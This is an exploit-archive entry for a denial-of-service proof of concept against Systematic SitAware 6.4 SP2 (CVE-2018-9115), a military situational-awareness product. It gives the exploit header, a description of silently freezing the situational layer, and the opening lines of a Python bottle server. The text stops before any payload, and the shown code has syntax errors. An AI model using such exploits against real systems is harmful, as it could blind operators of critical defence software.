Systematic sitaware nvg denial of service Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-03-30 |
Type : dos |
Platform : xml
This exploit / vulnerability Systematic sitaware nvg denial of service is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: SitAware NVG Denial of Service
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115
# Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing
# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
# that the Situational Picture is no more updated. Unfortunately the user can not notice until
# he tries to work with the situational layer.
#!/bin/python
from bottle import post, run, request, response
LHOST = 127.0.0.1 # Local IP which the NVG server should use
LPORT = 8080 # Local Port on which the NVG server should listen